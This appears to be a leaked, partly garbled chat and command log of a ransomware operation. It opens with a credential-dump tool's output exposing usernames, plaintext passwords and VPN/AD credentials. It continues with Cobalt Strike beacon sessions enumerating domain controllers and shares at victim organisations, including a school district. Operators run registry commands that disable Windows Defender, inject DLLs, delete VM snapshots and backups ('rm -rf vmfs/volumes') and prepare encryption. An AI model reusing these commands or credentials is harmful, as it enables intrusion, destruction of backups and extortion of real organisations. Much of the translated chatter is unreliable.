P0L!1nS3c0Nn0 Domain: L&M Domain [+] Found: SessionID: lufvh9TXJezldkQQ2KF5mimA3mnwS9qneyWGr4TFPOU= userType: 1 userName: cjackson Password: h44RsF2PP* Domain: L&M Domain [+] Found: SessionID: sDrdLmvwALSF3jTMnSUkHYwq9ZfWqPcbd0PlX0bBJ5o= userType: 1 userName: acox Password: December2020 Domain: L&M Domain [+] Found: SessionID: smA9plEUTxuk1LKzY0qOLCsOC7n7SJlG7pVwnj9aj9o= userType: 1 userName: cfarrell Password: Covid2019! 
Domain: L&M Domain [+] Found: SessionID: tel1xLliHnrxuJ4jG9eA1RfLrHgIi5RFNFdmA9qM9rA8= userType: 1 userName: lstrzegowski Password: Whiskers45$ Domain: L&M Domain [+] Found: SessionID: tn9IFU4flYiaulqazAeVJA5vWp5thOOj2ZzTvq08C9U= userType: 1 userName: aluckey Password: SelenaBrody&Champ35 Domain: L&M Domain [+] Found: SessionID: vhyW0wcf8tOIlogYk7tb4qpKNYGlZGPeAU1EiL1b8XY= userType: 1 userName: nthompson Password: Trinity2011 Domain: L&M Domain [+] Found: SessionID: wOfMo3AmB7a0a0a0tk8Js1kpwwINyCCTOHKWHIkhutrag= userType: 1 userName: sriggs Password: Sammers0309# Domain: L&M Domain [+] Found: SessionID: x1Fb1A3YjVnXF40T10eItH4OdjRdsxZG7MrCtqDLpxA= userType: 1 userName: tfewster Password: BabyItsColdOutside1 Domain: L&M Domain [+] Done with https://107.0.14.250, found 33 sessions 33 [+] Saving session data [+] Trying session 1jHJ05pyjLQw0GZvgyDhnE2jJwv0sFnc9toWZFfQpSM= [+] Saving config to ./Dumps/107.0.14.250/config.sqlite [==================================================] [+] Config dumped [+] Parsing configuration data [+] Finding users [+] Found 143 users [+] Finding AD credentials [!!!] Found Active Directory creds [+] AD creds sslvpn:4311_Secure@10.1.1.45 [+] Looking for LDAP domain credentials [-] No LDAP credentials found. [+] Looking for RADIUS domain creds [-] No usable RADIUS domain data [+] Parsing bookmarks [+] Found bookmarks, Hunting for creds [**] Found bookmark with creds [+] Found bookmark {'name': '1', 'username': 'sslvpn', 'password': '4311_Secure', 'service': 'RDP', 'host': '10.1.1.45'} com/group/1-done-expederal-com?msg=G2z6E3Dm4XPiahEer) no)) backups were on the wine servers1.done.expFederal.com there were not vim? 
so we can not do anything with them linux software we have no@user4 fuck you revealed all the cards)) USCHI-DT005.Hobbes.loc [10.20.20.37] sh-0004.hobbes.loc [10.20.4.4] DT-000016.Hobbes.loc [10.20.20.53] LT-000047.Hobbes.loc [10.20.99.175] LT-000060.Hobbes.loc [10.20.20.30] USCHI-TB001.Hobbes.loc [10.20.99.173] LT-000073.Hobbes.loc [10.20.99.172] uschi-psc001.hobbes.loc [10.20.4.56] TB-000025.Hobbes.loc [10.20.99.151] USCHI-HR-LT201.Hobbes.loc [10.20.99.153] TB-000028.Hobbes.loc [10.20.20.22] TB-000034.Hobbes.loc [10.20.99.160] DT-000037.Hobbes.loc [10.20.20.71]+ USCHI-AI-LT321.Hobbes.loc [10.20.99.178] LT-000116.Hobbes.loc [10.20.99.172] USCHI-PM-DT607.Hobbes.loc [10.20.32.201] USCHI-EM-LT403.Hobbes.loc [10.20.20.23] USCHA-EX-LT003.Hobbes.loc [10.6.0.105] ``` These are linux armas (at least they have no ipc$ or admin$ or c$ yb d$, etc.) ``` Host Name: USCHI-SBS002 OS Name: Microsoft Windows Server 2016 Standard OS Version: 10.0.14393 N/A Build 14393 OS Manufacturer: Microsoft Corporation OS Configuration: Member Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00377-70390-48722-AA601 Original Install Date: 5/15/2019, 3:10:42 PM System Boot Time: 12/9/2020, 5:51:51 PM System Manufacturer: VMware, Inc. System Model: VMware7,1 System Type: x64-based PC Processor(s): 2 Processor(s) Installed. [01]: Intel64 Family 6 Model 58 Stepping 0 GenuineIntel ~1700 Mhz [02]: Intel64 Family 6 Model 58 Stepping 0 GenuineIntel ~1700 Mhz BIOS Version: VMware, Inc. 
VMW71.00V.13989454.B64.1906190538, 6/19/2019 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume2 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-06:00) Central Time (US & Canada) Total Physical Memory: 16,383 MB Available Physical Memory: 15.093 MB Virtual Memory: Max Size: 18,815 MB Virtual Memory: Available: 17,620 MB Virtual Memory: In Use: 1,195 MB Page File Location(s): C:\pagefile.sys Domain: Hobbes.loc Logon Server: N/A Hotfix(s): 13 Hotfix(s) Installed. [01]: KB3186568 [02]: KB4049065 [03]: KB4494175 [04]: KB4498947 [05]: KB4503537 [06]: KB4520724 [07]: KB4524244 [08]: KB4540723 [09]: KB4550994 [10]: KB4562561 [11]: KB4565912 [12]: KB4576750 [13]: KB4593226 Network Card(s): 2 NIC(s) Installed. [01]: Intel(R) 82574L Gigabit Network Connection Connection Name: Internal DHCP Enabled: No IP address(es). [01]: 10.20.32.20 [02]: Intel(R) 82574L Gigabit Network Connection Connection Name: External DHCP Enabled: No IP address(es) [01]: 10.111.1.64 [02]: 10.111.1.63 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. ``` I found this shit, here's some hosts spinning under 1 ipi153 was alive on the input) and 57 arms of 10053 servers of which 46153 hosts[ ](https://mediaeveryone.com/group/expfederal-com?msg=kfJRgvJSmNwimgd78) arms exactly enough? 
I can not say more than that of the ones I work with, they are my favorite from top to bottom u v w x y z``` Disconnected U: \10.111.1.32\C$ Microsoft Windows Network Disconnected V: \10.20.32.200$ Microsoft Windows Network Disconnected W: \10.20.32.103$ Microsoft Windows Network OK X: \10.20.32.101$ Microsoft Windows Network OK Y: \10.20.32.202\C$ Microsoft Windows Network OK Z: \10.20.32.21\C$ Microsoft Windows Network I had a few servers that neither vmik, nor jump, nor remot eksekzekom did not attract30 unique ip armies) 10.20.20.46 10.20.20.37 10.20.20.50 10.20.32.90 10.20.4.4 10.20.20.53 10.20.99.150 10.20.99.163 10.20.99.158 10.20.99.175 10.20.20.31 10.20.20.30 10.20.99.152 10.20.99.173 10.20.99.172 10.20.99.159 10.6.0.105 10.20.4.56 10.20.20.56 10.20.99.151 10.20.99.154 10.20.99.153 10.20.20.22 10.20.99.156 10.20.99.160 10.20.20.71 10.20.99.178 10.20.99.180 10.20.32.201 10.20.20.23 ``52 unique ip'' 10.20.32.100 10.111.2.20 10.20.32.28 10.111.1.31 10.111.1.15 10.111.2.15 10.20.32.203 10.111.1.32 10.20.32.200 10.20.32.93 10.20.32.34 10.20.32.40 10.20.32.31 10.111.1.33 10.20.32.13 10.20.32.14 10.20.32.6 10.20.32.4 10.20.32.20 10.20.32.30 10.20.32.18 10.20.32.72 10.20.32.175 10.20.32.24 10.6.0.5 10.6.0.56 10.6.0.58 10.20.32.71 10.20.32.70 10.20.32.188 10.6.0.30 10.20.32.33 10.20.32.50 10.111.1.50 10.20.32.5 10.20.32.7 10.20.32.60 10.20.32.75 10.20.32.76 10.111.1.10 10.20.32.15 10.20.32.202 10.6.0.60 10.20.32.21 10.20.32.101 10.20.32.102 10.20.32.103 10.20.32.45 10.20.32.73 10.20.32.74 10.20.32.46 10.20.32.110 i had a report on the pings of the servers? 46 ip53 hostname or did you count 53 and 46 by ip? because hostnames refer to the same ip53 = 46? 46 servers shut down100 armas and nix53 serversa total of 153 live hostnames were with armas as soon as the servers 53 ``` LT-000082.Hobbes.loc [10.20.99.175] LT-000047.Hobbes.loc [10.20.99.175] ``[ ](https://mediaeveryone.com/group/expfederal-com?msg=z4FdusPQAXacvdFZj) total livehosts 53? 
so they have a few hostnames per ip53a fuck the number of livehosts in generalaahaa those 7 servers that are not closed what about them? 53 servers alive, 89 were in adcom how many live were otklabbed servers somehow not enough236 in adcom, there a bunch of old not thick however...236 comps total 53 pinged servers, closed 46 57 pinged armies, closed 39 and with armies so jeservers/closed servers shut downstatuvezde there are notes for stats guys18 armies minusda)),kznm``` Teemo beacon> net dclist [*] Tasked beacon to run net dclist [+] host called home, sent: 104506 bytes [+] received output: DCs: [+] received output: Server Name IP Address Platform Version Type Comment ----------- ---------- -------- ------- ---- ------- [-] Error: 6118 ``` ``` beacon> shell nltest /dclist:Hobbes [*] Tasked beacon to run: nltest /dclist:Hobbes [+] host called home, sent: 52 bytes [+] received output: Get list of DCs in domain 'Hobbes' from '\\USCHA-DCG002'. PCHIDCG003.Hobbes.loc [DS] Site: Chicago PCHIDCG004.Hobbes.loc [DS] Site: Chicago USCHI-DCP001.Hobbes.loc [DS] Site: Chicago USCHA-DCG002.Hobbes.loc [DS] Site: WDC USCHI-DCG001.Hobbes.loc [DS] Site: Chicago-DMZRWDCSupport USCHI-DCG003.Hobbes.loc [PDC] [DS] Site: Chicago PCHIDCG002.Hobbes.loc [RODC] [DS] Site: Chicago-DMZ sh-0004.hobbes.loc [RODC] The command completed successfully ``` ``` Teemo beacon> shell nltest /dclist:Hobbes.loc [*] Tasked beacon to run: nltest /dclist:Hobbes.loc [+] host called home, sent: 56 bytes [+] received output: Get list of DCs in domain 'Hobbes.loc' from '\\USCHA-DCG002.Hobbes.loc'. PCHIDCG003.Hobbes.loc [DS] Site: Chicago PCHIDCG004.Hobbes.loc [DS] Site: Chicago USCHI-DCP001.Hobbes.loc [DS] Site: Chicago USCHA-DCG002.Hobbes.loc [DS] Site: WDC USCHI-DCG001.Hobbes.loc [DS] Site: Chicago-DMZRWDCSupport USCHI-DCG003.Hobbes.loc [PDC] [DS] Site: Chicago PCHIDCG002.Hobbes.loc [RODC] [DS] Site: Chicago-DMZ sh-0004.hobbes.loc [RODC] The command completed successfully ``Fucking figured it out... 
You need to do an inject in the winlagon, then the flight is normal. and one is not pinged so there is already a note everywhere this does not always work immediately check the other way `` Teemo beacon> net domain_controllers [*] Tasked beacon to run net domain_controllers [+] host called home, sent: 104518 bytes [+] received output: Domain Controllers: [+] received output: [-] Error: 0 I have a lot of trouble with this, I can't get it to work, I'm not sure if it's working, but it's not working. wait for confirmation from voodootry it through eheav and def off? did not help gjvjukj that will be the current state you are here should remain uninstall they are replicated look, we have two snapshots, if we delete them, then we will also rub the machine?or the classic way to mask the disks somewhere try to offload av, vindefTry different archa in general clean the root home folder root[ ](https://mediaeveryone.com/group/expfederal-com?msg=6dKMvPj8Za59kfYWw) the command below is what? hang 20 minisli avers or something like that there is nothing - check if the bitness of the injected dll match the bitness of the system [root@uschi-vhp001:~] cat /etc/passwd root:x:0:0:Administrator:/:/bin/sh daemon:x:2:2:System daemons:/:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/:/sbin/nologin dcui:x:100:100:DCUI User:/:/sbin/nologin vpxuser:x:500:100:VMware VirtualCenter administration account:/:/bin/sh rootmgmt:x:1000:1000:ESXi User:/:/bin/sh vxpsvc_ptagent_op:x:1001:1001:ESXi User:/:/bin/sh ``If it gets up, it means that the injection process itself is being tapped by an aver or something[ ](https://mediaeveryone.com/group/expfederal-com?msg=ppyLCj2p7LQ9XuXpp) strange but there seems to be nothing to clean it hangs? 
or "gets up" ?on some armasPrimary injection kryptor session hangs you hope to clean the history of commands in linigui bluntly still such a thing through the gui better`rm -rf vmfs/volumes` look in the properties / settings no))) you there lin not format) and how to delete the previous snapshots, so as not to lose the current one?)leave the current state and run it there and delete the snapshots in the wmoknea, go to the web as before, delete the snapshots and leave the current state from the center in the web interface where do you delete them?)rm -rf so ok? also in the processesnaps removed from the center and with veem resolved the issue? in the rest everywhere there is a note these left to reattach and armas * if everything is ok, close dk check all servers for a note + armas also all?dk almost all the servers, only to re-sleep a couple of units)) but they work, apparently the session with the proxy hung upa, we thought the niks servers sphere rejectedda hz) and what shutdown you were talking about at all?) on niks lienapshots are deletedna we pulled these virtual servers, their polochimna that shutdown like what? *napshots started delete backupova virtual disks where these servers lie? can you get them to lock or are they on the nix somewhere? armas have pulled or pull armas already pulled it better when all pull it now tear it downDid you remove the 74 seksnapshots removed? no, ping passed[ ](https://mediaeveryonecom/group/expfederal-com?msg=2mcqWpWjKLkka3NdD) maybe they have a notifier to log on the csi or something is worth ... are you talking about the sphere? they probably turned off the not good? took off the network? @tl2 @tl1 servers with virtual machines removed from the network. our actions? 10.111.2.20 another dk not attracted? 10.20.32.101 10.20.32.21 10.20.32.202 10.111.1.10 ``` servers, no dns and dk for later ```. Get list of DCs in domain 'HOBBES' from '\\USCHI-DCP001'. 
PCHIDCG003.Hobbes.loc [DS] Site: Chicago PCHIDCG004.Hobbes.loc [DS] Site: Chicago USCHI-DCP001.Hobbes.loc [DS] Site: Chicago USCHA-DCG002.Hobbes.loc [DS] Site: WDC USCHI-DCG001.Hobbes.loc [DS] Site: Chicago-DMZRWDCSupport USCHI-DCG003.Hobbes.loc [PDC] [DS] Site: Chicago PCHIDCG002.Hobbes.loc [RODC] [DS] Site: Chicago-DMZ sh-0004.hobbes.loc [RODC] ``Take everything into the coba, or how then mapi armas on the server) suddenly, and we have already rubbed) no yet, the build waited[ ](https://mediaeveryone.com/group/expfederal-com?msg=a9ZRNruNqr5WfySKo) have you done it? SIOJDG*(H78SHD(HGL(&SE*FHUiWESY&*(HJGI ``Are we done with the centersof the sphere? Do we have to disable vindef and sofos? the new build seems to be working, right? now on the fast, we'll pull the servers into the cobu user 7@tl1 will now give the build the contents of the cryptimnu image yes just snapshots tear down wait for build)well @tl2backup server also found in hellcompact they had two nix servers in hell under the allsphere, now one is not available, the other whether not working, or not configured and these two that were found, not visible in ad comp - there are stored snapshots sofos admin foundnu we just overwrite them, right?[ ](https://mediaeveryone.com/group/expfederal-com?msg=5ptz5FSD23puGa8zk) under the root came here. is there a build under the lin? @echo off for /f %%i in (hosts.txt) do ( tasklist /s %%i /v >> .\ps.txt ) ``webrootanywhere``wsndomain.com - do not touch ``itc-us.com`` - work with her by kerbals by the way? 
if you use zerologon successfully there will be a chance to drink in the next day i think, so if you do it till the end today you can do it via @otam where today you will take YES you can finish it carefully can not promise anythingKILL THE NET INSTRUCTOR UP, HE CAN DO IT!before you go to groups, write down what's at what stage and don't kill the networkDisassemble the tool:fingers_crossed:where there are deadlocks today,//www.trendmicro.com/en_us/what-is/zerologon.htmlдо 12 today, not working on weekendsmonitor the input cob for new sessionswrite in groups that are active now and statuscom in the workIf there are new throw there, work what about the sessions? I have them off4 and 7priloveWhere are the rest of you? everyone Hello so already added? `itc-us-com `conf name where to add itc-us-com What is it? ITC.LOCAL turns out so#itc-us-com ?ITCMA and no yes there is a system I and user7 help user1 now I will add you to the team of free users write to the group where there is no system Yes tomorrow will be clear or without allThis weekend without me.And since you did not sleep tomorrow I will divide the day on "today - sleep - tomorrow" and not today then why tomorrow is tomorrow = today? tomorrow will be clear is still conditional info!!!!!!!!!!!!!!!!!!!!!!!!Saturday will be a day off, as well as on Sunday do we raise the system to 7 Yes? tomorrow = today tomorrow by 3 today until 7 Write the statuses in the active groups. how are you doing? ok, you have time to do some research, but there is no time at night we are closing the grid? if so, we have to hurry to start it while they have nightfall! it looks like they are still coming! hello where is @user3 ?hii all have a good day off fridayiday :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup:at 6 pm on9that is today? or sleep =tomorrow1.tomorrow on thursday friday extra day off tomorrow by 6 p.m. 
610 mina although stop probably I won't keep you up long :thumbsup:sleep till 10 so you said today let's sleep the sessions don't kill good job well done good guys today at 10 p.m. i mean today or at 10 p.m. i hope so) tomorrow is Thursday? no)morning? tomorrow by 10 then all of 277 23 or no pings or can not pull then servers[ ](https://mediaeveryonecom/group/sisd-net?msg=25bsnyQBjuzt8dybR) on two domains on the second domain servers?report on the 2 domainsomotely97 servers that could not jump all the disks pulled up and in the second what do we have? in our coba 153 servers.all? raise sagging 2 and remains dk finished? 13 what's left? in 20 minutes I think you can manage56 in 11 for each how much? not a lot of servers left? no so what's done? not all, do not break 7772 is NAS3 only on the free? tomorrow sleep on the gold? continue to dazhe i started the build, check the udm and then mappy went all server map closed? no sure, maybe 1000 somewhere or something smaller i thought you all are not finished? so servers with unmapped armaments close? skype a report on how many closed armaments and servers and basically kill them in a small domain beacon> shell systeminfo [*] Tasked beacon to run: systeminfo [+] host called home, sent: 41 bytes [+] received output: Host Name: AHS-VIDEO OS Name: Microsoft Windows Server 2012 R2 Standard OS Version: 6.3.9600 N/A Build 9600 OS Manufacturer: Microsoft Corporation OS Configuration: Member Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00252-70000-00000-AA535 Original Install Date: 8/4/2016, 10:49:05 AM System Boot Time: 11/30/2020, 7:44:12 AM System Manufacturer: Dell Inc. System Model: PowerEdge R230 System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~3504 Mhz BIOS Version: Dell Inc. 
2.3.2, 11/16/2017 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume2 System Locale: en-us;English (United States) Input Locale: N/A Time Zone: (UTC-07:00) Mountain Time (US & Canada) Total Physical Memory: 32.599 MB Available Physical Memory: 22,622 MB Virtual Memory: Max Size: 37.463 MB Virtual Memory: Available: 23,901 MB Virtual Memory: In Use: 13,562 MB Page File Location(s): C:\pagefile.sys Domain: admin.sisd.k12 Logon Server: N/A Hotfix(s): 185 Hotfix(s) Installed. [01]: KB2868626 [02]: KB2883200 [03]: KB2887595 [04]: KB2894029 [05]: KB2894179 [06]: KB2894852 [07]: KB2903939 [08]: KB2911106 [09]: KB2919355 [10]: KB2919394 [11]: KB2928680 [12]: KB2934520 [13]: KB2938066 [14]: KB2954879 [15]: KB2966826 [16]: KB2966828 [17]: KB2967917 [18]: KB2968296 [19]: KB2972103 [20]: KB2989930 [21]: KB3000483 [22]: KB3000850 [23]: KB3003057 [24]: KB3004545 [25]: KB3012235 [26]: KB3012702 [27]: KB3013172 [28]: KB3013531 [29]: KB3013538 [30]: KB3013769 [31]: KB3013791 [32]: KB3013816 [33]: KB3014442 [34]: KB3015696 [35]: KB3018133 [36]: KB3019978 [37]: KB3021910 [38]: KB3023219 [39]: KB3023266 [40]: KB3024751 [41]: KB3024755 [42]: KB3030947 [43]: KB3033446 [44]: KB3035126 [45]: KB3036612 [46]: KB3037576 [47]: KB3038002 [48]: KB3042085 [49]: KB3044374 [50]: KB3044673 [51]: KB3045634 [52]: KB3045685 [53]: KB3045717 [54]: KB3045719 [55]: KB3045755 [56]: KB3045999 [57]: KB3046017 [58]: KB3046737 [59]: KB3054169 [60]: KB3054203 [61]: KB3054256 [62]: KB30544464 [63]: KB3055323 [64]: KB3055343 [65]: KB3059317 [66]: KB3060681 [67]: KB3060793 [68]: KB3061512 [69]: KB3063843 [70]: KB3071756 [71]: KB3072307 [72]: KB3074228 [73]: KB3074545 [74]: KB3076949 [75]: KB307715 [76]: KB3078405 [77]: KB3080149 [78]: KB3084135 [79]: KB3084905 [80]: KB3086255 [81]: KB3087137 [82]: KB3091297 [83]: KB3094486 [84]: KB3095701 [85]: KB3097992 [86]: KB3099834 [87]: KB3100473 [88]: KB3102429 [89]: KB3103616 [90]: KB3103696 [91]: KB3103709 [92]: 
KB3109103 [93]: KB3109560 [94]: KB3109976 [95]: KB3110329 [96]: KB3115224 [97]: KB3118401 [98]: KB3121261 [99]: KB3123245 [100]: KB3126434 [101]: KB3126587 [102]: KB3127222 [103]: KB3133043 [104]: KB3133690 [105]: KB3134179 [106]: KB3134815 [107]: KB3135782 [108]: KB3137728 [109]: KB3138378 [110]: KB3138602 [111]: KB3138910 [112]: KB3138962 [113]: KB3139164 [114]: KB3139398 [115]: KB3139914 [116]: KB3140219 [117]: KB3140234 [118]: KB3145384 [119]: KB3145432 [120]: KB3146604 [121]: KB3146723 [122]: KB3146751 [123]: KB3147071 [124]: KB3155784 [125]: KB3156059 [126]: KB3159398 [127]: KB3161949 [128]: KB3162343 [129]: KB3162835 [130]: KB3172614 [131]: KB3172729 [132]: KB3173424 [133]: KB3175024 [134]: KB3178539 [135]: KB3179574 [136]: KB3185319 [137]: KB3186539 [138]: KB4033369 [139]: KB4033428 [140]: KB4040972 [141]: KB4040974 [142]: KB4040981 [143]: KB4041777 [144]: KB4043763 [145]: KB4048951 [146]: KB4049179 [147]: KB4054566 [148]: KB4054854 [149]: KB4056887 [150]: KB4095875 [151]: KB4096417 [152]: KB4098972 [153]: KB4103729 [154]: KB4338832 [155]: KB4457009 [156]: KB4457015 [157]: KB4457034 [158]: KB4457045 [159]: KB4457146 [160]: KB4459935 [161]: KB4459941 [162]: KB4462930 [163]: KB4477029 [164]: KB4480054 [165]: KB4480064 [166]: KB4480095 [167]: KB4480979 [168]: KB4483187 [169]: KB4483450 [170]: KB4483459 [171]: KB4486105 [172]: KB4487038 [173]: KB4493478 [174]: KB4532931 [175]: KB4532940 [176]: KB4532946 [177]: KB4534117 [178]: KB4537759 [179]: KB4552933 [180]: KB4552982 [181]: KB4561600 [182]: KB4565613 [183]: KB4565635 [184]: KB4566425 [185]: KB4565541 Network Card(s): 6 NIC(s) Installed. 
[01]: Intel(R) Gigabit 4P I350-t Adapter Connection Name: Synology1 DHCP Enabled: No IP address(es) [01]: 192.168.4.5 [02]: Intel(R): Intel(R) Gigabit 4P I350-t Adapter Connection Name: Synology2 DHCP Enabled: No IP address(es) [01]: 192.168.4.1 [03]: Intel(R): Intel(R) Gigabit 4P I350-t Adapter Connection Name: Slot 1 Port 3 Status: Hardware not present [04]: Intel(R) Gigabit 4P I350-t Adapter Connection Name: Slot 1 Port 4 Status: Media disconnected [05]: Broadcom NetXtreme Gigabit Ethernet Connection Name: NIC1 DHCP Enabled: No IP address(es) [01]: 10.11.200.121 [02]: fe80::5023:321f:3ab4:86d7 [06]: Broadcom NetXtreme Gigabit Ethernet Connection Name: NIC2 Status: Media disconnected Hyper-V Requirements: VM Monitor Mode Extensions: Yes Virtualization Enabled In Firmware: Yes Second Level Address Translation: Yes Data Execution Prevention Available: Yes ``Well, what's cool besides dns and dkpolly? Did you close the second domain? Give me more sisteminfo of this session and everything ok try the exe`` `` C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t reg_dword /d 0 /f The operation completed successfully. C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\Windows\ /t reg_dword /d 0 /f The operation completed successfully. C:\ProgramData>reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f Access is denied. C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f Access is denied. C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f Access is denied. C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f Access is denied. 
C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
Access is denied.
C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
Access is denied.
C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
Access is denied.
C:\ProgramData>reg add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f
Access is denied.
C:\ProgramData>reg add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v Start /t REG_DWORD /d 4 /f
Access is denied.
C:\ProgramData>reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v Start /t REG_DWORD /d 4 /f
The operation completed successfully.
``Second domain, by the way, closed? drop WinDef @user8 and try through ehenhene broke DNS, DCserver632 dllinject - architecture - gonet, session what? How should I know and what is this? yes: all servers were closed?
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 217711 bytes
[-] relocation truncated to fit (distance between executable code and other data is >4GB)
``Yeah, and then the eyes in a bunch already. CHae when will the DC break? work prettak so what do you have there? The main thing is that the session did not fall off. kv in the process just about this yanu like the udmi is, and the format does not all change the files a udmi? well there not all files appear .HWOEU or something like that? only readme.txt file, by the way, appeared; session should be alive; open it please; 2860 give the beacon PID and tdnase close the server with hrv No c.lf` ``
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 217711 bytes
[+] received output:
Injected.
[+] host called home, sent: 19 bytes
[+] host called home, sent: 20 bytes
``Launch a zamapilid server in parallel; do we drop mapping and start encrypting?
here.lf listing C: how do we know what works? in the session where mapping under any creds? blank dllinject field in the argument, what to put in?
Geordi.sisd.k12 [PDC] [DS] Site: DoTs
Picard.sisd.k12 [DS] Site: DoTs
Lor.sisd.k12 [DS] Site: Ed-Center
``````
ADMINDC5 10.0.61.13
ADMINDC1 10.0.61.2
ADMINDC3 10.0.61.6
ADMINDC4 10.0.61.7
ADMINDC2 10.0.61.10
SPOCK 10.7.51.3
AZUREDC1 10.221.32.4
``To the very last, do NOT TAKE THEM AND DON'T TAKE THEM, specify the appropriate bitness, dll launch via dllinject on servers where it is mapped in full``SDFHGS*^EFG*&WE`t have any fuckin` left? by two, but ours is the least of it. Servers are starting to hang; you are divided by 3 Cobalts? We are starting to hang; what to map, we map, then continue the list``
beacon> shell net view \\10.16.239.134\
[*] Tasked beacon to run: net view \\10.16.239.134\
[+] host called home, sent: 56 bytes
[+] received output:
There are no entries in the list.
Then there's no resonance? Did you use the IP to map? I got 50 out of 200 workstations - 30% - The network path was not found. 70% - The network path was not found. I leave those servers and go map workstations?
beacon> shell net use * \\10.0.53.26\dump
[*] Tasked beacon to run: net use * \\10.0.53.26\dump
[+] host called home, sent: 58 bytes
[+] received output:
System error 53 has occurred.
The network path was not found.
beacon> shell net use * \\10.0.53.26\engrade
[*] Tasked beacon to run: net use * \\10.0.53.26\engrade
[+] host called home, sent: 61 bytes
[+] received output:
System error 53 has occurred.
The network path was not found.
``Map everything or one of them? Not yet```
beacon> shell net view \\10.0.53.26\
[*] Tasked beacon to run: net view \\10.0.53.26\
[+] host called home, sent: 53 bytes
[+] received output:
Shared resources at \\10.0.53.26\
Share name Type Used as Comment
-------------------------------------------------------------------------------
dump Disk
engrade Disk
Import_Services Disk
SMDIM Disk
VT_Integration Disk
The command completed successfully.
``` Did you copy these?
beacon> shell net view \\10.0.53.26\
[*] Tasked beacon to run: net view \\10.0.53.26\
[+] host called home, sent: 53 bytes
[+] received output:
Shared resources at \\10.0.53.26\
Share name Type Used as Comment
-------------------------------------------------------------------------------
dump Disk
engrade Disk
Import_Services Disk
SMDIM Disk
VT_Integration Disk
The command completed successfully.
beacon> shell net view \\10.0.50.1\
[*] Tasked beacon to run: net view \\10.0.50.1\
[+] host called home, sent: 52 bytes
[+] received output:
There are no entries in the list.
beacon> shell net view \\10.0.53.25\
[*] Tasked beacon to run: net view \\10.0.53.25\
[+] host called home, sent: 53 bytes
[+] received output:
There are no entries in the list.
``the same story``
beacon> shell net view \\10.51.200.121\
[*] Tasked beacon to run: net view \\10.51.200.121\
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.
The network path was not found.
``Check with another server, are those from ``??''?
- MY-SISD-NFS: 10.0.61.61 ?
- VIDEO-SOH: 10.13.200.122 mapped
- VDI-PVS: 10.210.0.40 mapped
- STU-HOME: 10.0.61.57 ???
- T-HYPERV: 10.0.53.230 ???
- SESROEVIDEOSVR: 10.116.200.121 ???
- RIERHM-VIDEOSVR: 10.58.200.121 ???
- SQLCLUSTER: 10.0.53.25 ???
- VDI-PVS01-2: 10.210.0.51 mapped
- STU-SERVER: 10.0.50.1 ???
- VDI-PVS02-1: 10.210.0.42 mapped
- VDI-XD02: 10.210.0.62 mapped
- VDI-PVS01-1: 10.210.0.41 mapped
- VDI-XD01: 10.210.0.61 mapped.
- NPM-01: 10.0.51.84 mapped
- CAUSQLCL8wx: 10.0.53.24 mapped
- VDI-PVS02-2: 10.210.0.52 mapped
- CLARKE-SVE: 10.51.200.121 ?
- TylerSISCluster: 10.0.53.26 ???
- CATE-NAS: 10.0.61.69 mapped
``````
beacon> shell net view \\10.0.61.61\
[*] Tasked beacon to run: net view \\10.0.61.61\
[+] host called home, sent: 53 bytes
[+] received output:
Shared resources at \\10.0.61.61\
Share name Type Used as Comment
-------------------------------------------------------------------------------
Scann Disk
The command completed successfully.
beacon> shell net view \\10.0.61.57\
[*] Tasked beacon to run: net view \\10.0.61.57\
[+] host called home, sent: 53 bytes
[+] received output:
There are no entries in the list.
beacon> shell net view \\10.0.53.230\
[*] Tasked beacon to run: net view \\10.0.53.230\
[+] host called home, sent: 54 bytes
[+] received output:
There are no entries in the list.
beacon> shell net view \\10.116.200.121\
[*] Tasked beacon to run: net view \\10.116.200.121\
[+] host called home, sent: 57 bytes
[+] received output:
System error 53 has occurred.
The network path was not found.
beacon> shell net view \\10.58.200.121\
[*] Tasked beacon to run: net view \\10.58.200.121\
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.
The network path was not found.
beacon> shell net view \\10.0.53.25\
[*] Tasked beacon to run: net view \\10.0.53.25\
[+] host called home, sent: 53 bytes
[+] received output:
There are no entries in the list.
beacon> shell net view \\10.0.50.1\
[*] Tasked beacon to run: net view \\10.0.50.1\
[+] host called home, sent: 52 bytes
[+] received output:
There are no entries in the list.
beacon> shell net view \\10.0.53.26\
